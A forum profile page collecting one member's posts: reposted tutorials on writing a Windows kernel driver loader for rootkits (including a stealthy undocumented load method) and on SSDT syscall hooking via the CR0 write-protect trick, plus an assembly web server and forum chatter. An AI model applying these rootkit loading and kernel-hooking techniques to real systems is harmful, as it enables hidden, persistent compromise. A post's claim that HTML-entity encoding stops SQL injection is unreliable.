Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18713

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro
    Creating your own driver loader in C | Driver Loader | Source Code | Rootkit January 27, 2011 — genesisdatabase Technically, there’s 2 way of loading a rootkit according to Greg Hoglund when he wrote Rootkits: Subverting the Windows Kernel book. One is called The Quick-And-Dirty Way to Load a Driver. This method allows you to “load a driver into the kernel without having to create any registry keys. “Pageable” refers to memory that can be swapped to disk. If a driver is pageable, any part of the driver could be paged out (that is, swapped from memory to disk). Sometimes when memory is paged out, it cannot be accessed; an attempt to do so will result in the infamous Blue Screen of Death (a system crash)” by using an undocumented API call. A sample loader that uses this method is called migbot where you can find the source code here. //---------------------------------------------------------------- // load a sys file as a driver using undocumented method //---------------------------------------------------------------- bool load_sysfile() { SYSTEM_LOAD_AND_CALL_IMAGE GregsImage; WCHAR daPath[] = L"\\??\\C:\\MIGBOT.SYS"; ////////////////////////////////////////////////////////////// // get DLL entry points ////////////////////////////////////////////////////////////// if(!(RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( GetModuleHandle("ntdll.dll"),"RtlInitUnicodeString"))) { return false; } if(!(ZwSetSystemInformation = (ZWSETSYSTEMINFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll"),"ZwSetSystemInformation" ))) { return false; } RtlInitUnicodeString(&(GregsImage.ModuleName),daPath); if(!NT_SUCCESS(ZwSetSystemInformation(SystemLoadAndCallImage,&GregsImage,sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)))) { return false; } return true; } What you see above is the loading code for migbotloader. “Migbot does not offer an unload feature; once it is loaded, it cannot be unloaded until reboot. Think of this as a “fire-and-forget” operation. The advantage to using this method is that it can be stealthier than more-established protocols. The downside is that it complicates the rootkit design. For migbot, this is a good solution; but for complex rootkits with many hooks, this method would require supporting too much overhead.” The other method would be the right way to load a driver! According to Greg Hoglund, “the established and correct way to load a driver is to use the Service Control Manager (SCM). Using the SCM causes registry keys to be created. When a driver is loaded using the SCM, it is non-pageable. This means your callback functions, IRP-handling functions, and other important code will not vanish from memory, be paged out, or cause Blue Screens of Death. This is a Good Thing.” bool _util_load_sysfile(char *theDriverName) { char aPath[1024]; char aCurrentDirectory[515]; SC_HANDLE sh = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if(!sh) { return false; } GetCurrentDirectory( 512, aCurrentDirectory); _snprintf(aPath,1022,"%s\\%s.sys",aCurrentDirectory,theDriverName); printf("loading %s\n", aPath); SC_HANDLE rh = CreateService(sh, theDriverName, theDriverName, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, aPath, NULL, NULL, NULL, NULL, NULL); if(!rh) { if (GetLastError() == ERROR_SERVICE_EXISTS) { // service exists rh = OpenService(sh,theDriverName,SERVICE_ALL_ACCESS); if(!rh) { CloseServiceHandle(sh); return false; } } else { CloseServiceHandle(sh); return false; } } // start the drivers if(rh) { if(0 == StartService(rh, 0, NULL)) { if(ERROR_SERVICE_ALREADY_RUNNING == GetLastError()) { // no real problem } else { CloseServiceHandle(sh); CloseServiceHandle(rh); return false; } } CloseServiceHandle(sh); CloseServiceHandle(rh); } return true; } What you are about to see will make you smash your screen! Generally what you are about to read is the source code that i have created to load your own personal driver loader. This source code has been written and compiled by me a year ago when i first started my venture into rootkit. Generally it is a CLI menu driven loader, you can choose to load, unload, start and stop the driver you have. This source code should be easy to compile in most IDE, the IDE that was used was Microsoft Visual Studio C++ 6.0. Download the compiled source code (.exe) for whatever reason you need! /* * This source code was written by GenesisDatabase * Visit http://genesisdatabase.wordpress.com for more source codes! * * Date of release: 27th January 2011 */ #include <windows.h> #include <stdio.h> #define Cleanup(x, y, z) {x = y; goto z;} #define FLUSH fflush(stdin); #define DRIVER_LOADED 0x00000001 #define DRIVER_STARTED 0x00000002 #define DRIVER_STOPPED 0x00000003 #define DRIVER_UNLOADED 0x00000004 #define DRIVER_CANT_LOAD 0x00000010 #define DRIVER_CANT_START 0x00000020 #define DRIVER_CANT_STOP 0x00000030 #define DRIVER_CANT_UNLOAD 0x00000040 typedef struct { DWORD driverstatus; }DRIVER_LOADER, *PDRIVER_LOADER; int FileExists(const char *driverpath) { FILE *fExists = fopen(driverpath, "r"); if(!fExists) return 0; fclose(fExists); return 1; } int myLoadDriver(const char *drivername, const char *driverpath) { SC_HANDLE hSCManager; SC_HANDLE hService; int ret = 1; if(!FileExists(driverpath)) Cleanup(ret, -1, c); hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if(!hSCManager) Cleanup(ret, -2, c); hService = CreateService( hSCManager, drivername, drivername, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,//SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driverpath, NULL, NULL, NULL, NULL, NULL); if(!hService) Cleanup(ret, -3, c); c: if(hService) CloseServiceHandle(hService); if(hSCManager) CloseServiceHandle(hSCManager); return ret; } int myStartDriver(char *drivername) { SC_HANDLE hSCManager; SC_HANDLE hService; int ret = 1; hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if(!hSCManager) Cleanup(ret, -1, c); hService = OpenService(hSCManager, drivername, SERVICE_ALL_ACCESS); if(!hService) Cleanup(ret, -2, c); if(!StartService(hService, 0, NULL)) Cleanup(ret, -3, c); c: if(hService) CloseServiceHandle(hService); if(hSCManager) CloseServiceHandle(hSCManager); return ret; } int myStopDriver(char *drivername) { SC_HANDLE hSCManager; SC_HANDLE hService; SERVICE_STATUS ss; int ret = 1; hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if(!hSCManager) Cleanup(ret, -1, c); hService = OpenService(hSCManager, drivername, SERVICE_ALL_ACCESS); if(!hService) Cleanup(ret, -2, c); if(!ControlService(hService, SERVICE_CONTROL_STOP, &ss)) Cleanup(ret, -3, c); c: if(hService) CloseServiceHandle(hService); if(hSCManager) CloseServiceHandle(hSCManager); return ret; } int myUnloadDriver(const char *drivername) { SC_HANDLE hSCManager; SC_HANDLE hService; SERVICE_STATUS ss; int ret = 1; hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if(!hSCManager) Cleanup(ret, -1, c); hService = OpenService(hSCManager, drivername, SERVICE_ALL_ACCESS); if(!hService) Cleanup(ret, -2, c); // try to stop service first ControlService(hService, SERVICE_CONTROL_STOP, &ss); if(!DeleteService(hService)) Cleanup(ret, -4, c); c: if(hService) CloseServiceHandle(hService); if(hSCManager) CloseServiceHandle(hSCManager); return ret; } void funcLoadDriver(DRIVER_LOADER *dl) { char drivername[256+1]; char driverpath[256+1]; char selection; int err; for( ; ; ) { printf(" Enter driver's name\n - "); FLUSH; scanf("%256[^\n]", drivername); printf(" Enter driver's full path\n - "); FLUSH; scanf("%256[^\n]", driverpath); printf(" Confirm (Y - yes | N - no | B - back): "); FLUSH; scanf("%c", &selection); switch(selection) { case 'y': case 'Y': printf(" Performing : myLoadDriver\n"); err = myLoadDriver(drivername, driverpath); dl->driverstatus = DRIVER_LOADED; if(err != 1) { dl->driverstatus = DRIVER_CANT_LOAD; printf(" Error : myLoadDriver (%d)\n", err); printf(" GetLastError: (%d)\n", GetLastError()); return; }printf(" Success : myLoadDriver\n"); return; case 'n': case 'N': break; case 'b': case 'B': return; default: printf(" Wrong option selected, default to N\n"); break; } printf("\n"); } } void funcStartDriver(DRIVER_LOADER *dl) { char drivername[256+1]; char selection; int err; for( ; ; ) { printf(" Enter driver's name\n - "); FLUSH; scanf("%256[^\n]", drivername); printf(" Confirm (Y - yes | N - no | B - back): "); FLUSH; scanf("%c", &selection); switch(selection) { case 'y': case 'Y': printf(" Performing : myStartDriver\n"); err = myStartDriver(drivername); dl->driverstatus = DRIVER_STARTED; if(err != 1) { dl->driverstatus = DRIVER_CANT_START; printf(" Error : myStartDriver (%d)\n", err); printf(" GetLastError: (%d)\n", GetLastError()); return; }printf(" Success : myStartDriver\n"); return; case 'n': case 'N': break; case 'b': case 'B': return; default: printf(" Wrong option selected, default to N\n"); break; } printf("\n"); } } void funcStopDriver(DRIVER_LOADER *dl) { char drivername[256+1]; char selection; int err; for( ; ; ) { printf(" Enter driver's name\n - "); FLUSH; scanf("%256[^\n]", drivername); printf(" Confirm (Y - yes | N - no | B - back): "); FLUSH; scanf("%c", &selection); switch(selection) { case 'y': case 'Y': printf(" Performing : myStopDriver\n"); err = myStopDriver(drivername); dl->driverstatus = DRIVER_STOPPED; if(err != 1) { dl->driverstatus = DRIVER_CANT_STOP; printf(" Error : myStopDriver (%d)\n", err); printf(" GetLastError: (%d)\n", GetLastError()); return; }printf(" Success : myStopDriver\n"); return; case 'n': case 'N': break; case 'b': case 'B': return; default: printf(" Wrong option selected, default to N\n"); break; } printf("\n"); } } void funcUnloadDriver(DRIVER_LOADER *dl) { char drivername[256+1]; char selection; int err; for( ; ; ) { printf(" Enter driver's name\n - "); FLUSH; scanf("%256[^\n]", drivername); printf(" Confirm (Y - yes | N - no | B - back): "); FLUSH; scanf("%c", &selection); switch(selection) { case 'y': case 'Y': printf(" Performing : myUnloadDriver\n"); err = myUnloadDriver(drivername); dl->driverstatus = DRIVER_UNLOADED; if(err != 1) { dl->driverstatus = DRIVER_CANT_UNLOAD; printf(" Error : myUnloadDriver (%d)\n", err); printf(" GetLastError: (%d)\n", GetLastError()); return; }printf(" Success : myUnloadDriver\n"); return; case 'n': case 'N': break; case 'b': case 'B': return; default: printf(" Wrong option selected, default to N\n"); break; } printf("\n"); } } int main(int argc, char **argv) { DRIVER_LOADER dl; int selection; for( ; ; ) { printf(" 1 - Load a driver\n" " 2 - Start service\n" " 3 - Stop service\n" " 4 - Unload a driver\n" " 0 - Exit\n" "\n" " Select an option: "); FLUSH; scanf("%d", &selection); switch(selection) { case 1: funcLoadDriver(&dl); break; case 2: funcStartDriver(&dl); break; case 3: funcStopDriver(&dl); break; case 4: funcUnloadDriver(&dl); break; case 0: printf(" Thanks for using...\n"); FLUSH; getchar(); return 0; default: break; } printf("\n"); } FLUSH; getchar(); return 0; } Sursa: Creating your own driver loader in C | Driver Loader | Source Code | Rootkit « Genesis Database
  2. Nytro
    [r00tkit] SSDT Hook for dummies Oct.10, 2010 Here I am again with my first tutorial which only focus on kerneland. We will do a simple approach to the System Service Dispatch Table (SSDT) Hook. The SSDT is in fact an array in which are stored all the syscalls addresses. A syscall is a function supplied straight by the kernel (kerneland) and usable by all userland processes. In order to hook a syscall in the SSDT, we will have thus to replace its address in the SSDT by the address of our function. The syscall we hook in the script will be ZwSetValueKey and will be our main thread all along this article. Code: /* Author: Shp * Website: http://www.shp-box.fr * Date: the 9th of October 2010 * Name: ssdt hook ZwSetValueKey This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/ */ #include <wdm.h> /****************/ /* Declarations */ /****************/ #pragma pack(1) typedef struct ServiceDescriptorEntry { unsigned int *ServiceTableBase; unsigned int *ServiceCounterTableBase; unsigned int NumberOfServices; unsigned char *ParamTableBase; } SSDT_Entry; #pragma pack() __declspec(dllimport) SSDT_Entry KeServiceDescriptorTable; // We import KeServiceDescriptorTable (ntoskrnl.exe) // SYSTEMSERVICE returns the address of the Nt* function corresponding to the Zw* function we put in argument #define SYSTEMSERVICE(_func) \ KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_func+1)] typedef NTSTATUS (*ZWSETVALUEKEY)( // The type of the target function HANDLE KeyHandle, PUNICODE_STRING ValueName, ULONG TitleIndex OPTIONAL, ULONG Type, PVOID Data, ULONG DataSize ); ZWSETVALUEKEY ZwSetValueKeyOriginal; // We will call this function to call the original target function when its address will be replaced by our hook function address in the SSDT /*******************/ /* The Hook Function */ /*******************/ // Our hook function will avoid values writing for "Run" and "RunOnce" key: in this way it prevents malwares from writing their path in those keys in order to open up at each reboot. NTSTATUS ZwSetValueKeyHook( IN HANDLE KeyHandle, IN PUNICODE_STRING ValueName, IN ULONG TitleIndex OPTIONAL, IN ULONG Type, IN PVOID Data, IN ULONG DataSize ) { PKEY_BASIC_INFORMATION pKeyInformation = NULL; int i, flag = 1; NTSTATUS ret; WCHAR targetKey1[] = L"Run"; // first key target WCHAR targetKey2[] = L"RunOnce"; // second key target unsigned long size = 0, sizeNeeded = 0; DbgPrint("[+] In da hook function =)\n"); ret = ZwQueryKey(KeyHandle, KeyBasicInformation, pKeyInformation, size, &sizeNeeded); // We use this function in order to get the current key name. If it Run or RunOnce we prevent from writing. if((ret == STATUS_BUFFER_TOO_SMALL) || (ret == STATUS_BUFFER_OVERFLOW)) { // If size not enough => we allocate more space memory size = sizeNeeded; pKeyInformation = (PKEY_BASIC_INFORMATION) ExAllocatePoolWithTag(NonPagedPool, sizeNeeded, 'aaaa'); ret = ZwQueryKey(KeyHandle, KeyBasicInformation, pKeyInformation, size, &sizeNeeded); } if(ret != STATUS_SUCCESS) return ZwSetValueKeyOriginal(KeyHandle, ValueName, TitleIndex, Type, Data, DataSize); if( (pKeyInformation->NameLength / sizeof(WCHAR)) == 3) { // 3 == strlen("Run") for(i = 0; i < strlen(targetKey1); i++) { if(pKeyInformation->Name[i] != targetKey1[i]) { // if one character is different from Run key name, flag = 0 flag = 0; break; } } } else if((pKeyInformation->NameLength / sizeof(WCHAR)) == 7) { // 7 == strlen("RunOnce") for(i = 0; i < strlen(targetKey2); i++) { if(pKeyInformation->Name[i] != targetKey2[i]) { // if one character is different from RunOnce key name, flag = 0 flag = 0; break; } } } else flag = 0; if(!flag) // If flag == 0 => normal work ... return ZwSetValueKeyOriginal(KeyHandle, ValueName, TitleIndex, Type, Data, DataSize); DbgPrint("[+] Bypassing Run key writing\n"); return STATUS_SUCCESS; // ... else the function will not be executed so no value writing ... } /*****************/ /* SSDT Functions */ /*****************/ void HookSSDT() { DbgPrint("[+] SSDTHOOK: in HookSSDT()\n"); ZwSetValueKeyOriginal = (ZWSETVALUEKEY) SYSTEMSERVICE(ZwSetValueKey); // We save target function address // unprotect CR0 __asm { push eax mov eax, CR0 and eax, 0FFFEFFFFh mov CR0, eax pop eax } // SYSTEMSERVICE(ZwSetValueKey) = (unsigned long *) ZwSetValueKeyHook; // We replace target function address by the address of our hook function // protect cr0 __asm { push eax mov eax, CR0 or eax, NOT 0FFFEFFFFh mov CR0, eax pop eax } // } void UnHookSSDT() { DbgPrint("[+] SSDTHOOK: in UnHookSSDT()\n"); // unprotect CR0 __asm { push eax mov eax, CR0 and eax, 0FFFEFFFFh mov CR0, eax pop eax } // SYSTEMSERVICE(ZwSetValueKey) = (ZWSETVALUEKEY) ZwSetValueKeyOriginal; // We delete hook by rewriting the good function address instead of our hook function address // protect cr0 __asm { push eax mov eax, CR0 or eax, NOT 0FFFEFFFFh mov CR0, eax pop eax } // } VOID unloadFunction(PDRIVER_OBJECT pDriverObject) { UnHookSSDT(); // unhook function } NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath) { HookSSDT(); // hook function pDriverObject->DriverUnload = unloadFunction; return STATUS_SUCCESS; } The principle ntoskrnl.exe process exports KeServiceDescriptorTable table hence we will import it. But what does it contain? typedef struct ServiceDescriptorEntry { unsigned int *ServiceTableBase; unsigned int *ServiceCounterTableBase; unsigned int NumberOfServices; unsigned char *ParamTableBase; } SSDT_Entry; ServiceTableBase is the SSDT address and ParamTableBase the System Service Parameter Table (SSPT) address. The SSPT contains for each function in the SSDT the number of bytes taken in arguments. Here is a very useful macro for our code: #define SYSTEMSERVICE(_func) \ KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_func+1)] It allows us to get the address of the place where the address of the _func function in the SSDT is stored since ServiceTableBase (so the SSDT) is an array of addresses.This macro is firstly hardly understandable but WinDbg makes our task easier. To begin with, we are sure that *(PULONG)((PUCHAR)_func+1) corresponds to the index of _func in the SSDT (between the []). Let’s see what is hidden at _func+1 therefore at ZwSetValueKey+1 in our case: kd> u ZwSetValueKey l 1 nt!ZwSetValueKey: 804dda08 b8f7000000 mov eax,0F7h Mov inserts 0xF7 value in eax: for each syscall, the first instruction is so: mov eax, SSDT_INDEX_VALUE Let’s now try to understand the casts: PULONG is the addresses type (PUCHAR cannot contain addresses such as FFFFFFFF because it is one byte size). The problem with PULONG during incrementation of our function (_func+1) is that _func will be incremented by 4 and not by 1! Indeed when we increments a pointer by 1, it is not incremented by 1 but by 1* sizeof(POINTER_TYPE) and we obviously know that sizeof(unsigned long) is 4. Therefore PUCHAR cast increments the pointer by 1 * sizeof(char) so by 1. Disable read-only SSDT protection At last we must know that SSDT writing is by default impossible: it is in most of cases in read-only mode. There are two technicals to modify this protection: one simple and another one less simple. We will choose the simplest one for our script but I will explain in few words how the second one works. CR0 Trick The first technical is called CR0 trick: CR0 is a register that when set to 0 disable all SSDT protections. Here is the assembler script which allows us to disable the protection: __asm { push eax // we save eax mov eax, CR0 // we put CR0 value into eax and eax, 0FFFEFFFFh // we apply the reverser filter mov CR0, eax // we update CR0 pop eax } And to enable it again: __asm { push eax mov eax, CR0 or eax, NOT 0FFFEFFFFh // the reverse operation to get CR0 state as before the hook mov CR0, eax pop eax // we get the eax save } Memory Descriptor List (MDL) The second technical is the use of MDL which allows our script to describe a part of the memory (here the SSDT) and therefore to modify its properties (here write access). The useful functions are MmCreateMdl, MmBuildMdlForNonPagedPool, MmMapLockedPages and MDL_MAPPED_TO_SYSTEM_VA flag. I have not really understood the interest of this method yet but if you are curious I suggest you to go to check out Ivanlef0u article (french). Now let us look at my script. Here is its working: he is going to hook ZwSetValueKey function that is used to modify or add values in a specified registry key. My hook function check if the current key is Run or RunOnce; if it is we prevent from writing. In the other case we let the function work normally. The purpose of this script is to protect the system from malwares that write their path in keys such as HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. It would allow them, if they had the permission, to start up again at each computer reboot. Sursa: [r00tkit] SSDT Hook for dummies - Shp Labz
  3. Nytro
    E bine asa cu tutorialele? Eu sunt de parere ca sunt lucruri foarte utile si fiecare trebuie sa apara pe index ca o categorie de sine statatoare. Voi ce parere aveti?
  4. Nytro
    Da, îmi place cum sun?, dar vreau s? m? gândesc mai bine. Probabil vom da la vot, dar trebuie mai întâi s? discut?m. R?mâne de v?zut. Cel pu?in câteva zile categoriile r?mân a?a cum sunt.
  5. Nytro
    Am cautat pe la "User Banning" dar nu am gasit Mutat la locul potrivit.
  6. Nytro
    Da, dar tot nu prea se potriveste la programare. Daca era Web Development da. Dar asa cu: HTML, Flash, Template-uri, CSS, Photoshop... Nu prea merge. Vreti PHP sau altceva: exista Programare. Descrierile sunt vechi, la fel si categoriile, ca "Web Design" nu o voi muta la Programare, dar astept sugestii. Stiu ca sunt si alte posturi, am vrut sa le mut, dar e plictisitor sa muti o gramada de topicuri. Si nu prea am urmarit acea sectiune, nu prea stiu ce s-a postat si discutat acolo.
  7. Nytro
    Nu, Web-Design e pentru partea de front-end, presupune doar Design: layout-uri sau mai stiu eu ce, deci Photoshop si familia si nu presupune cunostinte de programare. Doar grafica.
  8. Nytro
    MSetup_x86.exe - 17.6MB
  9. Nytro
    Deja ma plictisesc. Ban sa te linisteti putin.
  10. Nytro
    denjacker: Nu e bine nici asa, pot sa apara probleme daca filtrezi cuvinte. De exemplu, ce se intampla cu Western Union? Nu trebuie sa fi chiar atat de paranoic, sunt cateva caractere mai importante: , - / \ ' " ( ) . < > : $ = [ ] Bine, sunt destule, dar daca sunt inlocuite cu entitatile HTML, pe langa 4 octeti in plus ocupati in baza de date, nu vor fi probleme. Bine, vor fi! Daca cineva introduce un link si ii transformi "/"-le in entitati va fi urat la afisare, dar totul tine de proiectare.
  11. Nytro
    Cel mai simplu, pentru toate tipurile de filtrari, atat XSS cat si SQL Injection sau mai stiu eu ce, transformi caracterele speciale, cat mai multe, in entitati HTML. http://www.exploit-db.com/download_pdf/12904
  12. Nytro
    Principala idee e ca va suporta procesoarele ARM, deci va rula pe tablete si anumite telefoane. Asta e ideea principala, marea schimbare. Iar grafica va trebui adoptada si pentru aceste tipuri de dispozitive.
  13. Nytro
    Super, inseamna ca Romania incepe sa acorde mai multa atentie securitatii informatiei.
  14. Nytro
    Microsoft Mathematics 4.0 Brief Description Microsoft Mathematics provides a graphing calculator that plots in 2D and 3D, step-by-step equation solving, and useful tools to help students with math and science studies. Overview Microsoft Mathematics provides a set of mathematical tools that help students get school work done quickly and easily. With Microsoft Mathematics, students can learn to solve equations step-by-step while gaining a better understanding of fundamental concepts in pre-algebra, algebra, trigonometry, physics, chemistry, and calculus. Microsoft Mathematics includes a full-featured graphing calculator that’s designed to work just like a handheld calculator. Additional math tools help you evaluate triangles, convert from one system of units to another, and solve systems of equations. Download: http://www.microsoft.com/downloads/en/details.aspx?FamilyID=9caca722-5235-401c-8d3f-9e242b794c3a L-am gasit din intamplare. Imi place, va rezolva integrale, ecuatii, creezi grafice si multe alte prostii. Chiar daca nu va place matematica e posibil sa il gasiti util, explica si pas cu pas cum se rezolva unele probleme.
  15. Nytro
    Cinchy Assembly Web Server An efficient and simple web server written in x86 (by sterling stuart stein (s³)) A web server written in x86 assembly language. It only includes basic functions, respondes to GET requests, supports file download. A very good example of code. Read more: Cinchy Assembly Web Server - An efficient and simple web server written in x86 Cinchy server Main program by: S³ <scubed@frontiernet.net> Ext routine by: r.c. volgers <r.volgers@hccnet.nl> Bug reports by: Juvenile Delinquent <nervgaz@nervgaz.net> Buffer overflow Jonathan Donitz <jon_donitz@hotmail.com> 64k cut-off and forgot to reset buffer size Special thanks to: Iczelion <iczelion@galaxycorp.com> for making it Windows 2000 compatible! SpaceCommander / ByTeGeiZ <SpaceCommander@ByTeGeiZ.de> for information about the directory browse dialog and long file names and for telling me that ".." worked in the URL. Other additions: Makes sure that it is the GET command Can resume download (tested with Go!Zilla) If directory, will redirect to include / Recognizes %HH as hexadecimal Tells you your IP address and name Please send me (S³) e-mail! I like getting responses! How to use: Set up a directory for use by the server (for example: C:\WebPage) Run the program and click on "Pick Dir" and select your directory. Check the "Dir enabled" box if you want to allow directory viewing by clients, otherwise "dir/index.htm" will be used instead. If it is sending the file as the wrong type, use regedit and set/create a key in HKEY_CLASSES_ROOT of ".ext" (where ext is the file extension) to "Content Type" with the type (such as "application/x-zip-compressed") To access from another computer, type in your IP address or, over a LAN, the computer name. Read more: Cinchy Assembly Web Server - An efficient and simple web server written in x86 .386 .model flat,stdcall option casemap:none WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD ;Create dialog and handle msg WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD ;Main window function Cut PROTO :DWORD,:DWORD,:DWORD,:BYTE ;Cut off end of string StrLen PROTO :DWORD ;Find length of string StrCmp PROTO :DWORD,:DWORD ;Compare two strings StrCpy PROTO :DWORD,:DWORD ;Copy a string StrCat PROTO :DWORD,:DWORD ;String1+=String2 Ext PROTO ;Find MIME type for extension Resuming PROTO ;Look for resume data FillList PROTO :DWORD,:DWORD ;DIR into Listbox and send RemoveHex PROTO :DWORD,:DWORD ;Converts %HH to characters InsertHex PROTO :DWORD,:DWORD ;Converts characters to %HH FromHex PROTO :BYTE ;Converts hex digit to byte include \masm32\include\windows.inc include \masm32\include\user32.inc includelib \masm32\lib\user32.lib include \masm32\include\kernel32.inc includelib \masm32\lib\kernel32.lib include \masm32\include\shell32.inc includelib \masm32\lib\shell32.lib include \masm32\include\wsock32.inc includelib \masm32\lib\wsock32.lib include \masm32\include\advapi32.inc includelib \masm32\lib\advapi32.lib .data ClassName db "DLGCLASS",0 DlgName db "Form1",0 IcoName db "i",0 DefPath db "C:",0 DefName db "index.htm",0 Star db "*.*",0 DTitle db "Select base webpage directory:",0 Get db "GET",0 Content db "Content Type",0 Msg200 db "HTTP/1.1 200 OK",13,10 db "Expires: 0",13,10 db "Last-Modified: 0",13,10 db "Accept-Range: bytes",13,10 db "Content-Type: %s",13,10 db "Content-Length: %lu",13,10,13,10,0 Msg206 db "HTTP/1.1 206 Partial Content",13,10 db "Expires: 0",13,10 db "Last-Modified: 0",13,10 db "Accept-Range: bytes",13,10 db "Content-Type: %s",13,10 db "Content-Range: bytes=%lu-%lu/%lu",13,10 db "Content-Length: %lu",13,10,13,10,0 Msg404 db "HTTP/1.1 404 Not Found",13,10 db "Expires: 0",13,10 db "Last-Modified: 0",13,10 db "Accept-Range: bytes",13,10 db "Content-Type: text/html",13,10 db "Content-Length: 124",13,10,13,10 db "<TITLE>404 error</TITLE><B>Error 404: Page not found</B>",13,10 db "The URL does not exist. Check the link and your spelling.",0 Redir db "HTTP/1.1 301 Moved Permanently",13,10 db "Location: %s",13,10,0 Range db "range: bytes",0 Str0 db "<TITLE>Directory of ",0 Str1 db "</TITLE>",13,10,0 Str2 db "File:<BR><BR>",13,10,13,10,0 Str3 db 13,10,"<BR>Directory:<BR><BR>",13,10,13,10,0 Str4 db "<A HREF=",34,0 Str5 db 34,62,0 Str6 db "</A><BR>",13,10,0 HTML db "text/html",0 Type0 db "text/plain",0 hFile dd 0 hSock1 dd 0 hReg dd 0 pType dd 0 bi BROWSEINFO <0,0,0,offset DTitle,BIF_RETURNONLYFSDIRS,0,0,0> .data? hInstance HINSTANCE ? CommandLine LPSTR ? Count dd ? Exist dd ? FSize dd ? FOffset dd ? RFlag dd ? hDlg dd ? ;Handles hFind dd ? hMem dd ? pMem dd ? BufSize dd ? NotUsed dd ? RSBuf db 1024 dup(?) ;String buffers Buf1 db 1024 dup(?) Buf2 db 1024 dup(?) Buf3 db 1024 dup(?) Buf4 db 1024 dup(?) Path db 512 dup(?) wsadata WSADATA <> ;WinSock SA sockaddr_in <> fd WIN32_FIND_DATA <> .const WM_SOCKET equ WM_USER+256 .code program: INVOKE GetModuleHandle,0 mov hInstance,eax INVOKE GetCommandLine mov CommandLine,eax INVOKE WinMain,hInstance,0,CommandLine,SW_SHOWDEFAULT INVOKE ExitProcess,eax WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD LOCAL wc:WNDCLASSEX LOCAL msg:MSG mov wc.cbSize,SIZEOF WNDCLASSEX mov wc.style,CS_HREDRAW or CS_VREDRAW mov wc.lpfnWndProc,OFFSET WndProc mov wc.cbClsExtra,0 mov wc.cbWndExtra,DLGWINDOWEXTRA push hInst pop wc.hInstance mov wc.hbrBackground,COLOR_BTNFACE+1 mov wc.lpszClassName,OFFSET ClassName mov wc.lpszMenuName,0 INVOKE LoadIcon,hInstance,offset IcoName mov wc.hIcon,eax mov wc.hIconSm,eax INVOKE LoadCursor,0,IDC_ARROW mov wc.hCursor,eax INVOKE WSAStartup,101h,offset wsadata ;Use WinSock v1.1 INVOKE RegisterClassEx,addr wc ;Make Dialog box. INVOKE CreateDialogParam,hInstance,offset DlgName,0,0,0 mov hDlg,eax INVOKE ShowWindow,hDlg,SW_SHOWNORMAL INVOKE UpdateWindow,hDlg .WHILE TRUE ;Main window loop INVOKE GetMessage,addr msg,0,0,0 .BREAK .IF (!eax) INVOKE TranslateMessage,addr msg INVOKE DispatchMessage,addr msg .ENDW INVOKE WSACleanup ;Done with WinSock mov eax,msg.wParam ret WinMain endp WndProc proc hWnd:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM .IF uMsg==WM_DESTROY INVOKE closesocket,hSock1 INVOKE PostQuitMessage,0 .ELSEIF uMsg==WM_SHOWWINDOW INVOKE SendDlgItemMessage,hWnd,1000,WM_SETTEXT,0,offset DefPath INVOKE gethostname,offset Buf1,1024 ;Get name INVOKE SendDlgItemMessage,hWnd,1004,WM_SETTEXT,0,offset Buf1 INVOKE gethostbyname,addr Buf1 mov eax,[eax+12] mov eax,[eax] ;Get IP address mov eax,[eax] INVOKE inet_ntoa,eax INVOKE SendDlgItemMessage,hWnd,1005,WM_SETTEXT,0,eax INVOKE socket,PF_INET,SOCK_STREAM,IPPROTO_TCP mov hSock1,eax ;Configure listening socket mov SA.sin_family,AF_INET mov SA.sin_addr.S_un.S_addr,INADDR_ANY INVOKE htons,80 mov SA.sin_port,ax INVOKE WSAAsyncSelect,hSock1,hWnd,WM_SOCKET,FD_ACCEPT INVOKE bind,hSock1,offset SA,sizeof SA INVOKE listen,hSock1,5 ;Listen for connections .ELSEIF uMsg==WM_COMMAND mov eax,wParam .IF ax==1003 mov Buf4,0 ;Prompt for directory INVOKE SHBrowseForFolder,addr bi .IF eax==0 xor eax,eax ret .ENDIF ;Turn return value into pathname INVOKE SHGetPathFromIDList,eax,offset Buf4 .IF Buf4==0 xor eax,eax ret .ENDIF .IF Buf4[3]==0 ;If C:\ change to C: mov Buf4[2],0 .ENDIF INVOKE StrLen,offset Buf4 mov ecx,eax mov al,"\" mov edi,offset Buf4 @@@5: repnz scasb jnz @@@6 mov BYTE PTR[edi-1],"/" jmp @@@5 @@@6: INVOKE SendDlgItemMessage,hWnd,1000,WM_SETTEXT,0,offset Buf4 .ENDIF .ELSEIF uMsg==WM_SOCKET mov eax,lParam and eax,0FFFFh .IF ax==FD_ACCEPT INVOKE accept,hSock1,0,0 INVOKE WSAAsyncSelect,eax,hWnd,WM_SOCKET,FD_READ or FD_CLOSE .ELSEIF ax==FD_READ INVOKE recv,wParam,offset RSBuf,1024,0 mov al,32 mov ecx,10 lea edi,RSBuf repnz scasb dec edi push edi mov BYTE PTR[edi],0 